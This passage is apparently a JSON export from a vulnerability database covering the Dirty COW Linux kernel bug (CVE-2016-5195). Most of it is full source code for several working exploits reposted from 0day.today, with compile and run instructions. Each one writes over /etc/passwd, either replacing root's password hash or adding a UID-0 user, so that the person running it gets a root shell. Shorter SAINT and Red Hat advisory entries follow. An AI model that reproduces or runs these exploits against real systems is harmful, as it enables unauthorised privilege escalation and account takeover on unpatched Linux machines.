long>(~(ICANON | ECHO));\r\n \r\n if(tcsetattr(STDIN_FILENO, TCSANOW, &termNew) == -1)\r\n exitOnError(\"Error setting terminal in non-canonical mode.\");\r\n rawMode = true;\r\n \r\n while(true){\r\n FD_ZERO(&rfds);\r\n FD_SET(master, &rfds);\r\n FD_SET(STDIN_FILENO, &rfds);\r\n \r\n if(select(master + 1, &rfds, nullptr, nullptr, nullptr) < 0 )\r\n exitOnError(\"Error on select tty.\");\r\n \r\n if(FD_ISSET(master, &rfds)) {\r\n memset(buffv, 0, BUFFSIZE);\r\n bytes_read = read(master, buffv, BUFFSIZE - 1);\r\n if(bytes_read <= 0) break;\r\n if(write(STDOUT_FILENO, buffv, bytes_read) != bytes_read)\r\n exitOnError(\"Error writing on stdout.\");\r\n }\r\n \r\n if(FD_ISSET(STDIN_FILENO, &rfds)) {\r\n memset(buffv, 0, BUFFSIZE);\r\n bytes_read = read(STDIN_FILENO, buffv, BUFFSIZE - 1);\r\n if(bytes_read <= 0) exitOnError(\"Error reading from stdin.\");\r\n if(write(master, buffv, bytes_read) != bytes_read) break;\r\n }\r\n }\r\n }\r\n }\r\n \r\n return [](int ret, bool shell){ \r\n string msg = shell ? \"Exit.\\n\" : string(\"Root password is: \") + TXTPWD + \"Enjoy! :-)\\n\";\r\n if(ret <= MAXITER){cerr << msg; return 0;}\r\n else{cerr << \"Exploit failed.\\n\"; return 1;} \r\n }(iter, opShell);\r\n}\r\n \r\nvoid printInfo(char* cmd){\r\n cerr << cmd << \" [-s] [-n] | [-h]\\n\" << endl;\r\n cerr << \" -s open directly a shell, if the exploit is successful;\" << endl;\r\n cerr << \" -n combined with -s, doesn't restore the passwd file.\" << endl;\r\n cerr << \" -h print this synopsis;\" << endl;\r\n cerr << \"\\n If no param is specified, the program modifies the passwd file and exits.\" << endl;\r\n cerr << \" A copy of the passwd file will be create in the current directory as .ssh_bak\" << endl;\r\n cerr << \" (unprivileged user), if no parameter or -n is specified.\\n\" << endl;\r\n exit(1);\r\n}\r\n \r\nint main(int argc, char** argv){\r\n const char flags[] = \"shn\";\r\n int c;\r\n bool opShell = false,\r\n restPwd = true;\r\n \r\n opterr = 0;\r\n while ((c = getopt(argc, argv, flags)) != -1){\r\n switch (c){\r\n case 's':\r\n opShell = true;\r\n break;\r\n case 'n':\r\n restPwd = false;\r\n break;\r\n case 'h':\r\n printInfo(argv[0]);\r\n break;\r\n default:\r\n cerr << \"Invalid parameter.\" << endl << endl;\r\n printInfo(argv[0]);\r\n }\r\n }\r\n \r\n if(!restPwd && !opShell){\r\n cerr << \"Invalid parameter: -n requires -s\" << endl << endl;\r\n printInfo(argv[0]);\r\n }\r\n \r\n Dcow dcow(opShell, restPwd);\r\n return dcow.expl();\r\n}\n\n# 0day.today [2018-01-01] #", "sourceHref": "https://0day.today/exploit/26446", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-11T05:08:17", "bulletinFamily": "exploit", "description": "Exploit for linux platform in category local exploits", "modified": "2016-11-29T00:00:00", "published": "2016-11-29T00:00:00", "href": "https://0day.today/exploit/description/26431", "id": "1337DAY-ID-26431", "title": "Linux Kernel 2.6.22 < 3.9 - Dirty COW /proc/self/mem Race Condition Privilege Escalation (/etc/pa", "type": "zdt", "sourceData": "// EDB-Note: Compile: g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil\r\n// EDB-Note: Recommended way to run: ./dcow -s (Will automatically do \"echo 0 > /proc/sys/vm/dirty_writeback_centisecs\")\r\n//\r\n// -----------------------------------------------------------------\r\n// Copyright (C) 2016 Gabriele Bonacini\r\n//\r\n// This program is free software; you can redistribute it and/or modify\r\n// it under the terms of the GNU General Public License as published by\r\n// the Free Software Foundation; either version 3 of the License, or\r\n// (at your option) any later version.\r\n// This program is distributed in the hope that it will be useful,\r\n// but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n// GNU General Public License for more details.\r\n// You should have received a copy of the GNU General Public License\r\n// along with this program; if not, write to the Free Software Foundation,\r\n// Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA\r\n// -----------------------------------------------------------------\r\n \r\n#include <iostream>\r\n#include <fstream>\r\n#include <string>\r\n#include <thread>\r\n#include <sys/mman.h>\r\n#include <fcntl.h>\r\n#include <unistd.h>\r\n#include <sys/types.h>\r\n#include <pwd.h>\r\n#include <pty.h>\r\n#include <string.h>\r\n#include <termios.h>\r\n#include <sys/wait.h>\r\n#include <signal.h>\r\n \r\n#define BUFFSIZE 1024\r\n#define PWDFILE \"/etc/passwd\"\r\n#define BAKFILE \"./.ssh_bak\"\r\n#define TMPBAKFILE \"/tmp/.ssh_bak\"\r\n#define PSM \"/proc/self/mem\"\r\n#define ROOTID \"root:\"\r\n#define SSHDID \"sshd:\"\r\n#define MAXITER 300\r\n#define DEFPWD \"$6$P7xBAooQEZX/ham$9L7U0KJoihNgQakyfOQokDgQWLSTFZGB9LUU7T0W2kH1rtJXTzt9mG4qOoz9Njt.tIklLtLosiaeCBsZm8hND/\"\r\n#define TXTPWD \"dirtyCowFun\\n\"\r\n#define DISABLEWB \"echo 0 > /proc/sys/vm/dirty_writeback_centisecs\\n\"\r\n#define EXITCMD \"exit\\n\"\r\n#define CPCMD \"cp \"\r\n#define RMCMD \"rm \"\r\n \r\nusing namespace std;\r\n \r\nclass Dcow{\r\n private:\r\n bool run, rawMode, opShell, restPwd;\r\n void *map;\r\n int fd, iter, master, wstat;\r\n string buffer, etcPwd, etcPwdBak,\r\n root, user, pwd, sshd;\r\n thread *writerThr, *madviseThr, *checkerThr;\r\n ifstream *extPwd;\r\n ofstream *extPwdBak;\r\n struct passwd *userId;\r\n pid_t child; \r\n char buffv[BUFFSIZE];\r\n fd_set rfds;\r\n struct termios termOld, termNew;\r\n ssize_t ign;\r\n \r\n void exitOnError(string msg);\r\n public:\r\n Dcow(bool opSh, bool rstPwd);\r\n ~Dcow(void);\r\n int expl(void); \r\n};\r\n \r\nDcow::Dcow(bool opSh, bool rstPwd) : run(true), rawMode(false), opShell(opSh), restPwd(rstPwd),\r\n iter(0), wstat(0), root(ROOTID), pwd(DEFPWD), sshd(SSHDID), writerThr(nullptr),\r\n madviseThr(nullptr), checkerThr(nullptr), extPwd(nullptr), extPwdBak(nullptr), \r\n child(0){ \r\n userId = getpwuid(getuid());\r\n user.append(userId->pw_name).append(\":\");\r\n extPwd = new ifstream(PWDFILE); \r\n while (getline(*extPwd, buffer)){\r\n buffer.append(\"\\n\");\r\n etcPwdBak.append(buffer);\r\n if(buffer.find(root) == 0){\r\n etcPwd.insert(0, root).insert(root.size(), pwd);\r\n etcPwd.insert(etcPwd.begin() + root.size() + pwd.size(), \r\n buffer.begin() + buffer.find(\":\", root.size()), buffer.end());\r\n }else if(buffer.find(user) == 0 || buffer.find(sshd) == 0 ){\r\n etcPwd.insert(0, buffer);\r\n }else{\r\n etcPwd.append(buffer);\r\n }\r\n }\r\n extPwdBak = new ofstream(restPwd ? TMPBAKFILE : BAKFILE);\r\n extPwdBak->write(etcPwdBak.c_str(), etcPwdBak.size());\r\n extPwdBak->close();\r\n fd = open(PWDFILE,O_RDONLY);\r\n map = mmap(nullptr, etcPwdBak.size(), PROT_READ,MAP_PRIVATE, fd, 0);\r\n}\r\n \r\nDcow::~Dcow(void){\r\n extPwd->close();\r\n close(fd);\r\n delete extPwd; delete extPwdBak; delete madviseThr; delete writerThr; delete checkerThr;\r\n if(rawMode) tcsetattr(STDIN_FILENO, TCSANOW, &termOld);\r\n if(child != 0) wait(&wstat); \r\n}\r\n \r\nvoid Dcow::exitOnError(string msg){\r\n cerr << msg << endl;\r\n // if(child != 0) kill(child, SIGKILL);\r\n throw new exception();\r\n}\r\n \r\nint Dcow::expl(void){\r\n madviseThr = new thread([&](){ while(run){ madvise(map, etcPwdBak.size(), MADV_DONTNEED);} });\r\n writerThr = new thread([&](){ int fpsm = open(PSM,O_RDWR); \r\n while(run){ lseek(fpsm, reinterpret_cast<off_t>(map), SEEK_SET); \r\n ign = write(fpsm, etcPwd.c_str(), etcPwdBak.size()); }\r\n });\r\n checkerThr = new thread([&](){ while(iter <= MAXITER){ \r\n extPwd->clear(); extPwd->seekg(0, ios::beg); \r\n buffer.assign(istreambuf_iterator<char>(*extPwd),\r\n istreambuf_iterator<char>());\r\n if(buffer.find(pwd) != string::npos && \r\n buffer.size() >= etcPwdBak.size()){\r\n run = false; break;\r\n }\r\n iter ++; usleep(300000);\r\n }\r\n run = false;\r\n });\r\n \r\n cerr << \"Running ...\" << endl;\r\n madviseThr->join();\r\n writerThr->join();\r\n checkerThr->join();\r\n \r\n if(iter <= MAXITER){ \r\n child = forkpty(&master, nullptr, nullptr, nullptr);\r\n \r\n if(child == -1) exitOnError(\"Error forking pty.\");\r\n \r\n if(child == 0){ \r\n execlp(\"su\", \"su\", \"-\", nullptr);\r\n exitOnError(\"Error on exec.\");\r\n }\r\n \r\n if(opShell) cerr << \"Password overridden to: \" << TXTPWD << endl;\r\n memset(buffv, 0, BUFFSIZE);\r\n ssize_t bytes_read = read(master, buffv, BUFFSIZE - 1);\r\n if(bytes_read <= 0) exitOnError(\"Error reading su prompt.\");\r\n cerr << \"Received su prompt (\" << buffv << \")\" << endl; \r\n \r\n if(write(master, TXTPWD, strlen(TXTPWD)) <= 0) \r\n exitOnError(\"Error writing pwd on tty.\");\r\n \r\n if(write(master, DISABLEWB, strlen(DISABLEWB)) <= 0) \r\n exitOnError(\"Error writing cmd on tty.\");\r\n \r\n if(!opShell){\r\n if(write(master, EXITCMD, strlen(EXITCMD)) <= 0) \r\n exitOnError(\"Error writing exit cmd on tty.\");\r\n }else{\r\n if(restPwd){\r\n string restoreCmd = string(CPCMD).append(TMPBAKFILE).append(\" \").append(PWDFILE).append(\"\\n\");\r\n if(write(master, restoreCmd.c_str(), restoreCmd.size()) <= 0) \r\n exitOnError(\"Error writing restore cmd on tty.\");\r\n restoreCmd = string(RMCMD).append(TMPBAKFILE).append(\"\\n\");\r\n if(write(master, restoreCmd.c_str(), restoreCmd.size()) <= 0) \r\n exitOnError(\"Error writing restore cmd (rm) on tty.\");\r\n }\r\n \r\n if(tcgetattr(STDIN_FILENO, &termOld) == -1 )\r\n exitOnError(\"Error getting terminal attributes.\");\r\n \r\n termNew = termOld;\r\n termNew.c_lflag &= static_cast<unsigned long>(~(ICANON | ECHO));\r\n \r\n if(tcsetattr(STDIN_FILENO, TCSANOW, &termNew) == -1)\r\n exitOnError(\"Error setting terminal in non-canonical mode.\");\r\n rawMode = true;\r\n \r\n while(true){\r\n FD_ZERO(&rfds);\r\n FD_SET(master, &rfds);\r\n FD_SET(STDIN_FILENO, &rfds);\r\n \r\n if(select(master + 1, &rfds, nullptr, nullptr, nullptr) < 0 )\r\n exitOnError(\"Error on select tty.\");\r\n \r\n if(FD_ISSET(master, &rfds)) {\r\n memset(buffv, 0, BUFFSIZE);\r\n bytes_read = read(master, buffv, BUFFSIZE - 1);\r\n if(bytes_read <= 0) break;\r\n if(write(STDOUT_FILENO, buffv, bytes_read) != bytes_read)\r\n exitOnError(\"Error writing on stdout.\");\r\n }\r\n \r\n if(FD_ISSET(STDIN_FILENO, &rfds)) {\r\n memset(buffv, 0, BUFFSIZE);\r\n bytes_read = read(STDIN_FILENO, buffv, BUFFSIZE - 1);\r\n if(bytes_read <= 0) exitOnError(\"Error reading from stdin.\");\r\n if(write(master, buffv, bytes_read) != bytes_read) break;\r\n }\r\n }\r\n }\r\n }\r\n \r\n return [](int ret, bool shell){ \r\n string msg = shell ? \"Exit.\\n\" : string(\"Root password is: \") + TXTPWD + \"Enjoy! :-)\\n\";\r\n if(ret <= MAXITER){cerr << msg; return 0;}\r\n else{cerr << \"Exploit failed.\\n\"; return 1;} \r\n }(iter, opShell);\r\n}\r\n \r\nvoid printInfo(char* cmd){\r\n cerr << cmd << \" [-s] [-n] | [-h]\\n\" << endl;\r\n cerr << \" -s open directly a shell, if the exploit is successful;\" << endl;\r\n cerr << \" -n combined with -s, doesn't restore the passwd file.\" << endl;\r\n cerr << \" -h print this synopsis;\" << endl;\r\n cerr << \"\\n If no param is specified, the program modifies the passwd file and exits.\" << endl;\r\n cerr << \" A copy of the passwd file will be create in the current directory as .ssh_bak\" << endl;\r\n cerr << \" (unprivileged user), if no parameter or -n is specified.\\n\" << endl;\r\n exit(1);\r\n}\r\n \r\nint main(int argc, char** argv){\r\n const char flags[] = \"shn\";\r\n int c;\r\n bool opShell = false,\r\n restPwd = true;\r\n \r\n opterr = 0;\r\n while ((c = getopt(argc, argv, flags)) != -1){\r\n switch (c){\r\n case 's':\r\n opShell = true;\r\n break;\r\n case 'n':\r\n restPwd = false;\r\n break;\r\n case 'h':\r\n printInfo(argv[0]);\r\n break;\r\n default:\r\n cerr << \"Invalid parameter.\" << endl << endl;\r\n printInfo(argv[0]);\r\n }\r\n }\r\n \r\n if(!restPwd && !opShell){\r\n cerr << \"Invalid parameter: -n requires -s\" << endl << endl;\r\n printInfo(argv[0]);\r\n }\r\n \r\n Dcow dcow(opShell, restPwd);\r\n return dcow.expl();\r\n}\n\n# 0day.today [2018-01-11] #", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/26431"}, {"lastseen": "2018-01-09T19:17:02", "bulletinFamily": "exploit", "description": "Exploit for linux platform in category local exploits", "modified": "2016-10-22T00:00:00", "published": "2016-10-22T00:00:00", "href": "https://0day.today/exploit/description/25944", "id": "1337DAY-ID-25944", "type": "zdt", "title": "DirtyCow Linux Kernel Race Condition Exploit", "sourceData": "/*\r\n####################### dirtyc0w.c #######################\r\n$ sudo -s\r\n# echo this is not a test > foo\r\n# chmod 0404 foo\r\n$ ls -lah foo\r\n-r-----r-- 1 root root 19 Oct 20 15:23 foo\r\n$ cat foo\r\nthis is not a test\r\n$ gcc -lpthread dirtyc0w.c -o dirtyc0w\r\n$ ./dirtyc0w foo m00000000000000000\r\nmmap 56123000\r\nmadvise 0\r\nprocselfmem 1800000000\r\n$ cat foo\r\nm00000000000000000\r\n####################### dirtyc0w.c #######################\r\n*/\r\n#include <stdio.h>\r\n#include <sys/mman.h>\r\n#include <fcntl.h>\r\n#include <pthread.h>\r\n#include <string.h>\r\n \r\nvoid *map;\r\nint f;\r\nstruct stat st;\r\nchar *name;\r\n \r\nvoid *madviseThread(void *arg)\r\n{\r\n char *str;\r\n str=(char*)arg;\r\n int i,c=0;\r\n for(i=0;i<100000000;i++)\r\n {\r\n/*\r\nYou have to race madvise(MADV_DONTNEED) :: https://access.redhat.com/security/vulnerabilities/2706661\r\n> This is achieved by racing the madvise(MADV_DONTNEED) system call\r\n> while having the page of the executable mmapped in memory.\r\n*/\r\n c+=madvise(map,100,MADV_DONTNEED);\r\n }\r\n printf(\"madvise %d\\n\\n\",c);\r\n}\r\n \r\nvoid *procselfmemThread(void *arg)\r\n{\r\n char *str;\r\n str=(char*)arg;\r\n/*\r\nYou have to write to /proc/self/mem :: https://bugzilla.redhat.com/show_bug.cgi?id=1384344#c16\r\n> The in the wild exploit we are aware of doesn't work on Red Hat\r\n> Enterprise Linux 5 and 6 out of the box because on one side of\r\n> the race it writes to /proc/self/mem, but /proc/self/mem is not\r\n> writable on Red Hat Enterprise Linux 5 and 6.\r\n*/\r\n int f=open(\"/proc/self/mem\",O_RDWR);\r\n int i,c=0;\r\n for(i=0;i<100000000;i++) {\r\n/*\r\nYou have to reset the file pointer to the memory position.\r\n*/\r\n lseek(f,map,SEEK_SET);\r\n c+=write(f,str,strlen(str));\r\n }\r\n printf(\"procselfmem %d\\n\\n\", c);\r\n}\r\n \r\n \r\nint main(int argc,char *argv[])\r\n{\r\n/*\r\nYou have to pass two arguments. File and Contents.\r\n*/\r\n if (argc<3)return 1;\r\n pthread_t pth1,pth2;\r\n/*\r\nYou have to open the file in read only mode.\r\n*/\r\n f=open(argv[1],O_RDONLY);\r\n fstat(f,&st);\r\n name=argv[1];\r\n/*\r\nYou have to use MAP_PRIVATE for copy-on-write mapping.\r\n> Create a private copy-on-write mapping. Updates to the\r\n> mapping are not visible to other processes mapping the same\r\n> file, and are not carried through to the underlying file. It\r\n> is unspecified whether changes made to the file after the\r\n> mmap() call are visible in the mapped region.\r\n*/\r\n/*\r\nYou have to open with PROT_READ.\r\n*/\r\n map=mmap(NULL,st.st_size,PROT_READ,MAP_PRIVATE,f,0);\r\n printf(\"mmap %x\\n\\n\",map);\r\n/*\r\nYou have to do it on two threads.\r\n*/\r\n pthread_create(&pth1,NULL,madviseThread,argv[1]);\r\n pthread_create(&pth2,NULL,procselfmemThread,argv[2]);\r\n/*\r\nYou have to wait for the threads to finish.\r\n*/\r\n pthread_join(pth1,NULL);\r\n pthread_join(pth2,NULL);\r\n return 0;\r\n}\r\n\n\n# 0day.today [2018-01-09] #", "sourceHref": "https://0day.today/exploit/25944", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-28T03:24:54", "bulletinFamily": "exploit", "description": "Exploit for linux platform in category local exploits", "modified": "2016-11-29T00:00:00", "published": "2016-11-29T00:00:00", "href": "https://0day.today/exploit/description/26430", "id": "1337DAY-ID-26430", "type": "zdt", "title": "Linux Kernel 2.6.22 < 3.9 - Dirty COW PTRACE_POKEDATA Race Condition Privilege Escalation (/etc/p", "sourceData": "// EDB-Note: After getting a shell, doing \"echo 0 > /proc/sys/vm/dirty_writeback_centisecs\" may make the system more stable.\r\n//\r\n// This exploit uses the pokemon exploit of the dirtycow vulnerability\r\n// as a base and automatically generates a new passwd line.\r\n// The user will be prompted for the new password when the binary is run.\r\n// The original /etc/passwd file is then backed up to /tmp/passwd.bak\r\n// and overwrites the root account with the generated line.\r\n// After running the exploit you should be able to login with the newly\r\n// created user.\r\n//\r\n// To use this exploit modify the user values according to your needs.\r\n// The default is \"firefart\".\r\n//\r\n// Original exploit (dirtycow's ptrace_pokedata \"pokemon\" method):\r\n// https://github.com/dirtycow/dirtycow.github.io/blob/master/pokemon.c\r\n//\r\n// Compile with:\r\n// gcc -pthread dirty.c -o dirty -lcrypt\r\n//\r\n// Then run the newly create binary by either doing:\r\n// \"./dirty\" or \"./dirty my-new-password\"\r\n//\r\n// Afterwards, you can either \"su firefart\" or \"ssh [email\u00a0protected]\"\r\n//\r\n// DON'T FORGET TO RESTORE YOUR /etc/passwd AFTER RUNNING THE EXPLOIT!\r\n// mv /tmp/passwd.bak /etc/passwd\r\n//\r\n// Exploit adopted by Christian \"FireFart\" Mehlmauer\r\n// https://firefart.at\r\n//\r\n \r\n#include <fcntl.h>\r\n#include <pthread.h>\r\n#include <string.h>\r\n#include <stdio.h>\r\n#include <stdint.h>\r\n#include <sys/mman.h>\r\n#include <sys/types.h>\r\n#include <sys/stat.h>\r\n#include <sys/wait.h>\r\n#include <sys/ptrace.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <crypt.h>\r\n \r\nconst char *filename = \"/etc/passwd\";\r\nconst char *backup_filename = \"/tmp/passwd.bak\";\r\nconst char *salt = \"firefart\";\r\n \r\nint f;\r\nvoid *map;\r\npid_t pid;\r\npthread_t pth;\r\nstruct stat st;\r\n \r\nstruct Userinfo {\r\n char *username;\r\n char *hash;\r\n int user_id;\r\n int group_id;\r\n char *info;\r\n char *home_dir;\r\n char *shell;\r\n};\r\n \r\nchar *generate_password_hash(char *plaintext_pw) {\r\n return crypt(plaintext_pw, salt);\r\n}\r\n \r\nchar *generate_passwd_line(struct Userinfo u) {\r\n const char *format = \"%s:%s:%d:%d:%s:%s:%s\\n\";\r\n int size = snprintf(NULL, 0, format, u.username, u.hash,\r\n u.user_id, u.group_id, u.info, u.home_dir, u.shell);\r\n char *ret = malloc(size + 1);\r\n sprintf(ret, format, u.username, u.hash, u.user_id,\r\n u.group_id, u.info, u.home_dir, u.shell);\r\n return ret;\r\n}\r\n \r\nvoid *madviseThread(void *arg) {\r\n int i, c = 0;\r\n for(i = 0; i < 200000000; i++) {\r\n c += madvise(map, 100, MADV_DONTNEED);\r\n }\r\n printf(\"madvise %d\\n\\n\", c);\r\n}\r\n \r\nint copy_file(const char *from, const char *to) {\r\n // check if target file already exists\r\n if(access(to, F_OK) != -1) {\r\n printf(\"File %s already exists! Please delete it and run again\\n\",\r\n to);\r\n return -1;\r\n }\r\n \r\n char ch;\r\n FILE *source, *target;\r\n \r\n source = fopen(from, \"r\");\r\n if(source == NULL) {\r\n return -1;\r\n }\r\n target = fopen(to, \"w\");\r\n if(target == NULL) {\r\n fclose(source);\r\n return -1;\r\n }\r\n \r\n while((ch = fgetc(source)) != EOF) {\r\n fputc(ch, target);\r\n }\r\n \r\n printf(\"%s successfully backed up to %s\\n\",\r\n from, to);\r\n \r\n fclose(source);\r\n fclose(target);\r\n \r\n return 0;\r\n}\r\n \r\nint main(int argc, char *argv[])\r\n{\r\n // backup file\r\n int ret = copy_file(filename, backup_filename);\r\n if (ret != 0) {\r\n exit(ret);\r\n }\r\n \r\n struct Userinfo user;\r\n // set values, change as needed\r\n user.username = \"firefart\";\r\n user.user_id = 0;\r\n user.group_id = 0;\r\n user.info = \"pwned\";\r\n user.home_dir = \"/root\";\r\n user.shell = \"/bin/bash\";\r\n \r\n char *plaintext_pw;\r\n \r\n if (argc >= 2) {\r\n plaintext_pw = argv[1];\r\n printf(\"Please enter the new password: %s\\n\", plaintext_pw);\r\n } else {\r\n plaintext_pw = getpass(\"Please enter the new password: \");\r\n }\r\n \r\n user.hash = generate_password_hash(plaintext_pw);\r\n char *complete_passwd_line = generate_passwd_line(user);\r\n printf(\"Complete line:\\n%s\\n\", complete_passwd_line);\r\n \r\n f = open(filename, O_RDONLY);\r\n fstat(f, &st);\r\n map = mmap(NULL,\r\n st.st_size + sizeof(long),\r\n PROT_READ,\r\n MAP_PRIVATE,\r\n f,\r\n 0);\r\n printf(\"mmap: %lx\\n\",(unsigned long)map);\r\n pid = fork();\r\n if(pid) {\r\n waitpid(pid, NULL, 0);\r\n int u, i, o, c = 0;\r\n int l=strlen(complete_passwd_line);\r\n for(i = 0; i < 10000/l; i++) {\r\n for(o = 0; o < l; o++) {\r\n for(u = 0; u < 10000; u++) {\r\n c += ptrace(PTRACE_POKETEXT,\r\n pid,\r\n map + o,\r\n *((long*)(complete_passwd_line + o)));\r\n }\r\n }\r\n }\r\n printf(\"ptrace %d\\n\",c);\r\n }\r\n else {\r\n pthread_create(&pth,\r\n NULL,\r\n madviseThread,\r\n NULL);\r\n ptrace(PTRACE_TRACEME);\r\n kill(getpid(), SIGSTOP);\r\n pthread_join(pth,NULL);\r\n }\r\n \r\n printf(\"Done! Check %s to see if the new user was created\\n\", filename);\r\n printf(\"You can log in with username %s and password %s.\\n\\n\",\r\n user.username, plaintext_pw);\r\n printf(\"\\nDON'T FORGET TO RESTORE %s FROM %s !!!\\n\\n\",\r\n filename, backup_filename);\r\n return 0;\r\n}\n\n# 0day.today [2018-03-28] #", "sourceHref": "https://0day.today/exploit/26430", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "saint": [{"lastseen": "2019-06-04T23:19:39", "bulletinFamily": "exploit", "description": "Added: 10/27/2016 \nCVE: [CVE-2016-5195](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5195>) \nBID: [93793](<http://www.securityfocus.com/bid/93793>) \n\n\n### Background\n\nThis tool allows you to overwrite an arbitrary file on Linux systems. \n\n### Problem\n\nA race condition exists in the way the Linux kernel's memory subsystem handles the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged local user could use this flaw to gain write access to otherwise read-only memory mappings and thus gain elevated privileges on the system. \n\n### Resolution\n\nUpgrade to a fixed kernel package from your Linux vendor. \n\n### References\n\n<http://dirtycow.ninja/> \n<https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c> \n\n\n### Limitations\n\nExploit requires an existing unprivileged connection to the target. \n\n### Platforms\n\nLinux \n \n\n", "modified": "2016-10-27T00:00:00", "published": "2016-10-27T00:00:00", "id": "SAINT:ACA0D81E9F0D7499A5952D634DA1559F", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/linux_dirty_cow_local_file_overwrite", "title": "Linux Dirty COW Local File Overwrite", "type": "saint", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-11-15T12:42:49", "bulletinFamily": "exploit", "description": "Added: 10/27/2016 \nCVE: [CVE-2016-5195](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5195>) \nBID: [93793](<http://www.securityfocus.com/bid/93793>) \n\n\n### Background\n\nThis tool allows you to overwrite an arbitrary file on Linux systems. \n\n### Problem\n\nA race condition exists in the way the Linux kernel's memory subsystem handles the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged local user could use this flaw to gain write access to otherwise read-only memory mappings and thus gain elevated privileges on the system. \n\n### Resolution\n\nUpgrade to a fixed kernel package from your Linux vendor. \n\n### References\n\n<http://dirtycow.ninja/> \n<https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c> \n\n\n### Limitations\n\nExploit requires an existing unprivileged connection to the target. \n\n### Platforms\n\nLinux \n \n\n", "modified": "2016-10-27T00:00:00", "published": "2016-10-27T00:00:00", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/linux_dirty_cow_local_file_overwrite", "id": "SAINT:D99FE3AF85FA3F5D4D5C3CB8B43F5183", "type": "saint", "title": "Linux Dirty COW Local File Overwrite", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T19:19:26", "bulletinFamily": "exploit", "description": "Added: 10/27/2016 \nCVE: [CVE-2016-5195](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5195>) \nBID: [93793](<http://www.securityfocus.com/bid/93793>) \n\n\n### Background\n\nThis tool allows you to overwrite an arbitrary file on Linux systems. \n\n### Problem\n\nA race condition exists in the way the Linux kernel's memory subsystem handles the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged local user could use this flaw to gain write access to otherwise read-only memory mappings and thus gain elevated privileges on the system. \n\n### Resolution\n\nUpgrade to a fixed kernel package from your Linux vendor. \n\n### References\n\n<http://dirtycow.ninja/> \n<https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c> \n\n\n### Limitations\n\nExploit requires an existing unprivileged connection to the target. \n\n### Platforms\n\nLinux \n \n\n", "modified": "2016-10-27T00:00:00", "published": "2016-10-27T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/linux_dirty_cow_local_file_overwrite", "id": "SAINT:1E3BA1480EBC78481EFFC9BD1CFFBBE2", "type": "saint", "title": "Linux Dirty COW Local File Overwrite", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2019-08-13T18:44:58", "bulletinFamily": "unix", "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* A race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged, local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system. (CVE-2016-5195, Important)\n\nRed Hat would like to thank Phil Oester for reporting this issue.", "modified": "2016-10-27T12:44:17", "published": "2016-10-27T12:41:42", "id": "RHSA-2016:2120", "href": "https://access.redhat.com/errata/RHSA-2016:2120", "type": "redhat", "title": "(RHSA-2016:2120) Important: kernel security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:45:09", "bulletinFamily": "unix", "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* A race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged, local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system. (CVE-2016-5195, Important)\n\nRed Hat would like to thank Phil Oester for reporting this issue.", "modified": "2016-10-26T21:24:34", "published": "2016-10-26T19:24:13", "id": "RHSA-2016:2118", "href": "https://access.redhat.com/errata/RHSA-2016:2118", "type": "redhat", "title": "(RHSA-2016:2118) Important: kernel security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:46:13", "bulletinFamily": "unix", "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* A race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged, local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system. (CVE-2016-5195, Important)\n\nRed Hat would like to thank Phil Oester for reporting this issue.\n\nBug Fix(es):\n\n* Previously, the BUG_ON() signal appeared in the fs_clear_inode() function where the nfs_have_writebacks() function reported a positive value for nfs_inode->npages. As a consequence, a kernel panic occurred. The provided patch performs a serialization by holding the inode i_lock over the check of PagePrivate and locking the request, which fixes this bug. (BZ#1365157)", "modified": "2016-11-01T17:09:43", "published": "2016-11-01T14:16:02", "id": "RHSA-2016:2132", "href": 